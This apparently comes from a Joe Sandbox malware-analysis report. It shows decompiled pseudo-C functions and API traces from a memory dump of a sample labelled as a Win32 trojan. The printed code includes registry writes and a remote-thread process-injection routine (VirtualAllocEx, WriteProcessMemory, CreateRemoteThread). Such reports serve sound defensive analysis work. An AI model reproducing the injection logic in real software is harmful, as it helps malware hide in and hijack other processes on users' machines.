						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x02721abc
0x02721abc
0x02721ac5
0x02721acb
0x02721b9c
0x02721b9f
0x02721c8c
0x02721c8d
0x02721c90
0x02721c9b
0x02721718
0x02721718
0x0272171d
0x02721720
0x02721725
0x02721727
0x02721729
0x02721734
0x0272173b
0x02721746
0x02721746
0x0272173d
0x0272173d
0x0272173f
0x02721742
0x02721742
0x02721749
0x02721753
0x02721753
0x00000000
0x00000000
0x00000000
0x02721ad1
0x02721ad1
0x02721ad3
0x02721ad5
0x02721b38
0x02721b38
0x02721b3d
0x02721b41
0x00000000
0x00000000
0x02721b47
0x02721b4c
0x02721b4d
0x02721b4e
0x02721b53
0x02721b57
0x02721b61
0x02721b66
0x02721b67
0x00000000
0x02721b67
0x00000000
0x02721b57
0x02721b38
0x02721ad7
0x02721ad7
0x02721ad7
0x02721ad7
0x02721adb
0x02721ade
0x02721b0c
0x02721b0e
0x02721b23
0x02721b23
0x02721b10
0x02721b10
0x02721b13
0x02721b16
0x02721b19
0x02721b1c
0x02721b1e
0x02721b21
0x00000000
0x00000000
0x02721b21
0x02721b26
0x02721b28
0x02721b2a
0x02721b2d
0x02721ba5
0x02721ba8
0x02721baa
0x02721bac
0x02721bad
0x02721baf
0x02721b6c
0x02721b6c
0x02721b71
0x02721b79
0x00000000
0x00000000
0x02721b7d
0x02721b82
0x02721b87
0x02721b8f
0x02721b93
0x00000000
0x02721b93
0x00000000
0x02721b8f
0x02721b6c
0x02721bb1
0x02721bb1
0x02721bb9
0x02721bbd
0x02721bf4
0x02721bf7
0x02721bfa
0x02721bfc
0x02721c02
0x02721c04
0x02721c04
0x02721bbf
0x02721bbf
0x02721bbf
0x02721bc2
0x02721bc2
0x02721bc6
0x02721bca
0x02721c0c
0x02721c0f
0x02721c11
0x02721c13
0x02721c19
0x02721c1d
0x02721c1d
0x02721c19
0x02721bcc
0x02721bd2
0x02721c24
0x02721c2e
0x02721c5c
0x02721c62
0x02721c67
0x02721c6e
0x02721c78
0x02721c7e
0x02721c85
0x02721c89
0x02721c30
0x02721c30
0x02721c33
0x02721c35
0x02721c38
0x02721c3b
0x02721c3d
0x02721c4c
0x02721c51
0x02721c54
0x02721c58
0x02721c58
0x02721bd4
0x02721bd7
0x02721bda
0x02721be2
0x02721be7
0x02721bee
0x02721bf2
0x02721bf2
0x02721ae0
0x02721ae0
0x02721ae2
0x02721ae8
0x02721aeb
0x02721af4
0x02721af7
0x02721afa
0x02721afd
0x02721b00
0x02721b03
0x02721b06
0x02721b06
0x02721b08
0x02721b09
0x02721aed
0x02721aed
0x02721aed
0x02721aef
0x02721af1
0x02721af2
0x02721af2
0x02721aeb
0x02721ade

APIs

Sleep.KERNEL32(00000000,?), ref: 02721B47
Sleep.KERNEL32(0000000A,00000000,?), ref: 02721B61

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 720fb9b06c7d0bb4840e0f5c1c6b8ab1463c4555717278a0718c030ffdc26833
Instruction ID: 60c946a526a356e4110473de4742111ef0783e017acd7a84f9ae3f62cafd00cf
Opcode Fuzzy Hash: 720fb9b06c7d0bb4840e0f5c1c6b8ab1463c4555717278a0718c030ffdc26833
Instruction Fuzzy Hash: C151F0756012608FD716DF2CC984B56BBE0BB45314F9885AEE84CCB383E7B0D488CB91

Uniqueness

Uniqueness Score: -1.00%

Function 027235DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E027235DC(void** __eax, void* __ecx, void* __edx) {
				void* _t15;
				long _t16;
				long _t18;
				void** _t22;
				long _t24;
				signed int _t29;
				long _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t37 = __edx;
				_t33 = __ecx;
				_t22 = __eax;
				if(0xffffffffffff2850 == 0) {
					L4:
					_t22[1] = 0xd7b3;
					_t22[2] = _t37;
					_t22[9] = E027235B4;
					_t22[7] = E027230E4;
					if(_t22[0x12] == 0) {
						_t22[9] = E027230E4;
						if(_t33 == 3) {
							_t15 = GetStdHandle(0xfffffff5);
						} else {
							_t15 = GetStdHandle(0xfffffff6);
						}
					} else {
						_t18 = 0xc0000000;
						_t29 =  *0x274000c; // 0x0
						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x2740758);
						_t24 = 2;
						_t34 = _t33 - 3;
						if(_t34 != 0) {
							_t24 = 3;
							_t35 = _t34 + 1;
							if(_t35 != 0) {
								_t18 = 0x40000000;
								_t22[1] = 0xd7b2;
								if(_t35 + 1 != 0) {
									_t18 = 0x80000000;
									_t22[1] = 0xd7b1;
								}
							}
						}
						_t11 =  &(_t22[0x12]); // 0x2744a24
						_t15 = CreateFileA(_t11, _t18, _t32, 0, _t24, 0x80, 0); // executed
					}
					if(_t15 == 0xffffffff) {
						_t22[1] = 0xd7b0;
						_t16 = GetLastError();
						L18:
						return E02722D48(_t16);
					} else {
						 *_t22 = _t15;
						return _t15;
					}
				}
				if(0xffffffffffff2850 > 3) {
					_t16 = 0x66;
					goto L18;
				}
				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
					E02722D48(_t20);
				}
				goto L4;
			}

0x027235df
0x027235e1
0x027235e5
0x027235f1
0x02723608
0x02723608
0x0272360e
0x02723611
0x02723618
0x02723623
0x02723685
0x0272368f
0x02723697
0x02723691
0x02723697
0x02723697
0x02723625
0x02723625
0x0272362a
0x02723636
0x0272363c
0x02723641
0x02723644
0x02723646
0x0272364b
0x0272364c
0x0272364e
0x02723654
0x0272365a
0x0272365c
0x02723661
0x02723661
0x0272365a
0x0272364c
0x02723673
0x02723677
0x02723677
0x0272367f
0x027236a5
0x027236ab
0x027236b0
0x00000000
0x02723681
0x02723681
0x00000000
0x02723681
0x0272367f
0x027235f6
0x0272369e
0x00000000
0x0272369e
0x02723601
0x02723603
0x02723603
0x00000000

APIs

CreateFileA.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe,C0000000,?,00000000,00000002,00000080,00000000,?,02744B88,?,027236D5,02739B26,ScanBuffer,0273E77C,OpenSession,0273E77C), ref: 02723677
GetStdHandle.KERNEL32(000000F5,?,02744B88,?,027236D5,02739B26,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanBuffer,0273E77C,027449C4,ScanBuffer), ref: 02723697
GetLastError.KERNEL32(000000F5,?,02744B88,?,027236D5,02739B26,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanBuffer,0273E77C,027449C4,ScanBuffer), ref: 027236AB

Strings

C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe, xrefs: 02723676

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: CreateErrorFileHandleLast
String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
API String ID: 1572049330-1266061150
Opcode ID: 6da06bc679423d98b463ad4c799a8c7232c74f85b2530a6feaec3e0d0b3607ed
Instruction ID: 62a86d21092d131a2e78c9926c389ad6652fdb45c2adbf0e181e7013db76caea
Opcode Fuzzy Hash: 6da06bc679423d98b463ad4c799a8c7232c74f85b2530a6feaec3e0d0b3607ed
Instruction Fuzzy Hash: 18110A6130027096EB25DF5C8988B56795EEF84318F29C3DAD6088F3A5D63DC84CCB61

Uniqueness

Uniqueness Score: -1.00%

Function 02732A58 Relevance: 4.6, APIs: 3, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E02732A58(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t51;
				void* _t65;
				void* _t66;
				intOrPtr _t70;
				intOrPtr _t72;
				char _t73;
				intOrPtr _t77;
				void* _t89;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t73 = __edx;
				_t66 = __ecx;
				_t91 = _t92;
				_t93 = _t92 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t93 = _t93 + 0xfffffff0;
					_t29 = E02723EA8(_t29, _t91);
				}
				_t89 = _t66;
				_v5 = _t73;
				_t65 = _t29;
				_t87 = _a8;
				_push(_t91);
				_push(0x2732ba0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				if(_a8 != 0xffff) {
					E02732950(E02727FF8(_t89, _t87 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02728200(_t89,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0272A96C(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t70 =  *0x2740d10; // 0x272ff30
						E0272B278(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
						E0272425C();
					}
				} else {
					_t51 = CreateFileA(E02724D64(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					E02732950(_t51, 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02728200(_t89,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0272A96C(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t72 =  *0x2740eec; // 0x272ff28
						E0272B278(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
						E0272425C();
					}
				}
				_t27 = _t65 + 8; // 0x2730840
				E027248F4(_t27, _t89);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(E02732BA7);
				return E027248C4( &_v40, 4);
			}

0x02732a58
0x02732a58
0x02732a59
0x02732a5b
0x02732a63
0x02732a66
0x02732a69
0x02732a6c
0x02732a71
0x02732a73
0x02732a76
0x02732a76
0x02732a7b
0x02732a7d
0x02732a80
0x02732a82
0x02732a87
0x02732a88
0x02732a8d
0x02732a90
0x02732a98
0x02732b28
0x02732b31
0x02732b38
0x02732b40
0x02732b43
0x02732b4f
0x02732b57
0x02732b5a
0x02732b64
0x02732b71
0x02732b76
0x02732b76
0x02732a9a
0x02732ab4
0x02732abf
0x02732ac8
0x02732ad3
0x02732adb
0x02732ade
0x02732aea
0x02732af2
0x02732af5
0x02732aff
0x02732b0c
0x02732b11
0x02732b11
0x02732ac8
0x02732b7b
0x02732b80
0x02732b87
0x02732b8a
0x02732b8d
0x02732b9f

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02732BA0,?,?,02730838,00000001), ref: 02732AB4
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02732BA0,?,?,02730838,00000001), ref: 02732AE2

Part of subcall function 02727FF8: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02730838,02732B22,00000000,02732BA0,?,?,02730838), ref: 02728046

Part of subcall function 02728200: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02730838,02732B3D,00000000,02732BA0,?,?,02730838,00000001), ref: 0272821F

GetLastError.KERNEL32(00000000,02732BA0,?,?,02730838,00000001), ref: 02732B47

Part of subcall function 0272A96C: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0272C585,00000000,0272C5DF), ref: 0272A98B

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 4a4cadc6eefa6be983245f43b2c0c3f76e7cb13efc94b23ab896b58627d720b2
Instruction ID: c63cb585e27b583b07d3c76e5da2de0d2c39b8562a7d3888b4c3f2e160fefced
Opcode Fuzzy Hash: 4a4cadc6eefa6be983245f43b2c0c3f76e7cb13efc94b23ab896b58627d720b2
Instruction Fuzzy Hash: 8B317070A006189FDB02EFB9C885BEEBBE6AF48700F508465E914A7381D7755D098FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0273900C Relevance: 4.6, APIs: 3, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E0273900C(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _t27;
				char* _t29;
				void* _t43;
				intOrPtr _t49;
				void* _t53;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E02724D54(_v8);
				E02724D54(_v12);
				E02724D54(_a4);
				_push(_t53);
				_push(0x27390ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53 + 0xfffffff4;
				RegOpenKeyA(_t43, E02724D64(_v8),  &_v16); // executed
				_t27 = _a4;
				if(_t27 != 0) {
					_t27 =  *(_t27 - 4);
				}
				_t29 = E02724DBC( &_a4);
				RegSetValueExA(_v16, E02724D64(_v12), 0, 1, _t29, _t27); // executed
				RegCloseKey(_v16);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x27390b5);
				E027248C4( &_v12, 2);
				return E027248A0( &_a4);
			}

0x02739013
0x02739016
0x02739019
0x0273901e
0x02739026
0x0273902e
0x02739035
0x02739036
0x0273903b
0x0273903e
0x0273904f
0x02739054
0x02739059
0x0273905e
0x0273905e
0x02739066
0x0273907d
0x02739086
0x0273908d
0x02739090
0x02739093
0x027390a0
0x027390ad

APIs

RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 0273904F
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000000,027390AE), ref: 0273907D
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,00000000,027390AE), ref: 02739086

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 207738a047b4e998860105b4ca87327a2ff367ed11ea161bb66abee654416bf1
Instruction ID: bcf02f095e12fd221d84020d9ca6de30ba30ea8549f7d27ca9048fdaee882d35
Opcode Fuzzy Hash: 207738a047b4e998860105b4ca87327a2ff367ed11ea161bb66abee654416bf1
Instruction Fuzzy Hash: 7A11ECB1A00258BFEB12EBA9CC95A9E7BFDEF48700F404465F614E7250DB70EE488E51

Uniqueness

Uniqueness Score: -1.00%

Function 02735B0C Relevance: 4.6, APIs: 3, Instructions: 50
synchronizationthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02735B0C(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
				void* _t11;
				_Unknown_base(*)()* _t12;
				void* _t13;
				void* _t17;
				void* _t19;
				void* _t26;
				void* _t27;
				void* _t28;

				_t26 = __ecx;
				_t27 = __edx;
				_t19 = __eax;
				 *0x274452c = E02735AD8(__eax, _a8, __ecx);
				 *0x2744528 = E02735AD8(_t19, E02735A30(__edx), _t27);
				_t11 =  *0x274452c; // 0x4740000
				_t12 =  *0x2744528; // 0x47e0000
				_t13 = CreateRemoteThread(_t19, 0, 0, _t12, _t11, 0, 0x2744534); // executed
				_t28 = _t13;
				if(_a4 != 0) {
					WaitForSingleObject(_t28, 0xffffffff);
					_t17 =  *0x274452c; // 0x4740000
					ReadProcessMemory(_t19, _t17, _t26, _a8, 0x2744530);
				}
				return _t28;
			}

0x02735b12
0x02735b14
0x02735b16
0x02735b24
0x02735b3b
0x02735b47
0x02735b4d
0x02735b58
0x02735b5d
0x02735b63
0x02735b68
0x02735b77
0x02735b7e
0x02735b7e
0x02735b89

APIs

Part of subcall function 02735AD8: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,02735B24), ref: 02735AED
Part of subcall function 02735AD8: WriteProcessMemory.KERNEL32(?,00000000,?,?,02744518,?,00000000,?,00003000,00000040,?,?,?,?,02735B24), ref: 02735AFD

CreateRemoteThread.KERNEL32(?,00000000,00000000,047E0000,04740000,00000000,02744534), ref: 02735B58
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02735B68
ReadProcessMemory.KERNEL32(?,04740000,?,?,02744530,00000000,000000FF), ref: 02735B7E

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
String ID:
API String ID: 3966641755-0
Opcode ID: 60391aa2a31c904dd33716278d46f63d980762396b46d5ce618bf51381b64094
Instruction ID: 17bac5897de9605fd7e68f39db42900a4eb631a8f3239120ba39f68a243f58a6
Opcode Fuzzy Hash: 60391aa2a31c904dd33716278d46f63d980762396b46d5ce618bf51381b64094
Instruction Fuzzy Hash: DC0186767402343BE702A6ADAC94F6AB7DDEB4D621F50852BF505D7381CA70DC045FA4

Uniqueness

Uniqueness Score: -1.00%

Function 027389A4 Relevance: 4.5, APIs: 3, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E027389A4(char __eax, void* __ebx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				void* _t16;
				char _t17;
				void* _t25;
				intOrPtr _t29;
				void* _t35;

				_v12 = __edx;
				_v8 = __eax;
				E02724D54(_v8);
				E02724D54(_v12);
				_push(_t35);
				_push(0x2738a21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35 + 0xfffffff8;
				_push(0);
				_t16 = E02724D64(_v12);
				_push(_t16); // executed
				L027269E0(); // executed
				_t25 = _t16;
				_t17 = _v8;
				if(_t17 != 0) {
					_t17 =  *((intOrPtr*)(_t17 - 4));
				}
				_push(_t17);
				_push(E02724DBC( &_v8));
				_push(_t25); // executed
				L027269E8(); // executed
				L027269D8();
				_t29 = _t25;
				 *[fs:eax] = _t29;
				_push(0x2738a28);
				return E027248C4( &_v12, 2);
			}

0x027389ac
0x027389af
0x027389b5
0x027389bd
0x027389c4
0x027389c5
0x027389ca
0x027389cd
0x027389d0
0x027389d5
0x027389da
0x027389db
0x027389e0
0x027389e2
0x027389e7
0x027389ec
0x027389ec
0x027389f0
0x027389f9
0x027389fa
0x027389fb
0x02738a01
0x02738a08
0x02738a0b
0x02738a0e
0x02738a20

APIs

_lcreat.KERNEL32(00000000,00000000), ref: 027389DB
_lwrite.KERNEL32(00000000,00000000,?,00000000,02738A21), ref: 027389FB
_lclose.KERNEL32(00000000), ref: 02738A01

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: _lclose_lcreat_lwrite
String ID:
API String ID: 381991513-0
Opcode ID: 046609e4ca5292f54a263d44353cb471639463fb7e99bdb23e3541c73f05c78d
Instruction ID: a212bfcc72ac750855d02543002f8ef220cbf3d315045f97854354b5b7db649b
Opcode Fuzzy Hash: 046609e4ca5292f54a263d44353cb471639463fb7e99bdb23e3541c73f05c78d
Instruction Fuzzy Hash: 78018F70604258BFEB12EBA5CC9599EBBEDEB08700F5004B6F900E3251DA30AE04CA11

Uniqueness

Uniqueness Score: -1.00%

Function 027233C4 Relevance: 3.1, APIs: 2, Instructions: 61
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E027233C4(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t47;
				signed int _t48;
				signed int _t58;

				_t58 = _t48;
				_t47 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E02722D48(0x67);
					_v8 = 0;
				} else {
					if(ReadFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t47 + 8);
						if(_a16 == 0) {
							if(_t58 != _v8) {
								E02722D48(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E02722D48(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}

0x027233cb
0x027233cf
0x027233dc
0x0272343d
0x02723444
0x027233de
0x027233f3
0x02723410
0x02723418
0x02723427
0x0272342c
0x02723433
0x02723433
0x0272341a
0x02723420
0x02723420
0x027233f5
0x027233fa
0x02723401
0x02723401
0x027233f3
0x0272344f

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 027233EE
GetLastError.KERNEL32(?,?,?,00000000), ref: 027233F5

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
Instruction ID: 708f9cf40ed07c33321974d5583e9985129a00ed1c06dd9f3b1ddc279f670585
Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
Instruction Fuzzy Hash: E2114271704168EFDB45DFA9D984AAEB7F9EF48250B6080E6E808DB200E734DE04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 027233C2 Relevance: 3.0, APIs: 2, Instructions: 39
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E027233C2(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t48;
				signed int _t50;
				signed int _t64;

				_push(_t50);
				_t64 = _t50;
				_t48 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E02722D48(0x67);
					_v8 = 0;
				} else {
					if(ReadFile( *__eax, __edx, __eax[2] * _t64,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t48 + 8);
						if(_a16 == 0) {
							if(_t64 != _v8) {
								E02722D48(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E02722D48(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}

0x027233c7
0x027233cb
0x027233cf
0x027233dc
0x0272343d
0x02723444
0x027233de
0x027233f3
0x02723410
0x02723418
0x02723427
0x0272342c
0x02723433
0x02723433
0x0272341a
0x02723420
0x02723420
0x027233f5
0x027233fa
0x02723401
0x02723401
0x027233f3
0x0272344f

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 027233EE
GetLastError.KERNEL32(?,?,?,00000000), ref: 027233F5

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
Instruction ID: 7aaba0b367aef98b955d69a3802a30853584e185c115d3798e00b742b09683b9
Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
Instruction Fuzzy Hash: 70F05471704228BFD704DAAADC84F6AB7ECEF54660B1084B6F908CB101E674DD04C670

Uniqueness

Uniqueness Score: -1.00%

Function 0272CAC6 Relevance: 3.0, APIs: 2, Instructions: 34
libraryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0272CAC6(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x272cb3a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x272cb1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_v12 = LoadLibraryA(E02724D64(_t12));
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0272CB23);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x0272cac9
0x0272cacb
0x0272cacf
0x0272cad2
0x0272cad7
0x0272cadc
0x0272cadd
0x0272cae2
0x0272cae5
0x0272cae8
0x0272caed
0x0272caee
0x0272caf3
0x0272caf6
0x0272cb06
0x0272cb0b
0x0272cb0e
0x0272cb11
0x0272cb16
0x0272cb18
0x0272cb1b

APIs

SetErrorMode.KERNEL32 ref: 0272CAD2
LoadLibraryA.KERNEL32(00000000,00000000,0272CB1C,?,00000000,0272CB3A), ref: 0272CB01

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 9e7f5fa4c780ef53978542814d0b68dfd9a81ca9c97a0646c2bcc7a5a2a488ad
Instruction ID: f8d474f50616a250b95dc3342c50c08732fc144144b702c6ac5ad8c913cca71f
Opcode Fuzzy Hash: 9e7f5fa4c780ef53978542814d0b68dfd9a81ca9c97a0646c2bcc7a5a2a488ad
Instruction Fuzzy Hash: A0F082B0614744BFEB135F768C6182FBBEDE74AB1075348B9F801E2A50E5385814C960

Uniqueness

Uniqueness Score: -1.00%

Function 0272CAC8 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0272CAC8(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x272cb3a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x272cb1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_v12 = LoadLibraryA(E02724D64(_t12));
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0272CB23);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

APIs

SetErrorMode.KERNEL32 ref: 0272CAD2
